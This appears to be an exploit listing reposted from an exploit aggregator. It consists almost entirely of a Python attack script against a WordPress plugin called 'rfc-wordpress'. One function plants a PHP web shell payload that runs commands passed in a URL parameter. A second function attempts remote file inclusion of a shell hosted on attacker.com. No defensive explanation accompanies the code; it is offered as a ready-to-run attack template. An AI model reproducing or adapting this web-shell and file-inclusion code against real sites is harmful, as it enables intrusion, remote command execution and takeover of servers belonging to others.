Share
## https://sploitus.com/exploit?id=PACKETSTORM:179099
Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8  
  
import requests  
import sys  
  
target = "https://target.com"  
  
# Exploit for Remote Code Execution (RCE) in RFC WordPress 6.0.8  
#CODE BY E1.Coders "The King of Security"  
def exploit_rfc_wordpress():  
url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php"  
payload = "<?php system($_GET['cmd']); ?>"  
  
try:  
response = requests.post(url, data={"rfc_action": "save_settings", "rfc_settings": payload})  
if response.status_code == 200:  
print("RCE exploit successful!")  
print(f"Visit {url}?cmd=whoami to execute commands")  
else:  
print("RCE exploit failed.")  
except requests.exceptions.RequestException as e:  
print(f"Error: {e}")  
  
# Exploit for Remote File Inclusion (RFI) in RFC WordPress  
def exploit_rfi_rfc_wordpress():  
url = f"{target}/wp-content/plugins/rfc-wordpress/rfc.php?rfc_action=save_settings"  
payload = "http://attacker.com/shell.php"  
  
try:  
response = requests.post(url, data={"rfc_settings": payload})  
if response.status_code == 200:  
print("RFI exploit successful!")  
print(f"Visit {target}/wp-content/plugins/rfc-wordpress/shell.php to execute commands")  
else:  
print("RFI exploit failed.")  
except requests.exceptions.RequestException as e:  
print(f"Error: {e}")  
  
if __name__ == "__main__":  
exploit_rfc_wordpress()  
exploit_rfi_rfc_wordpress()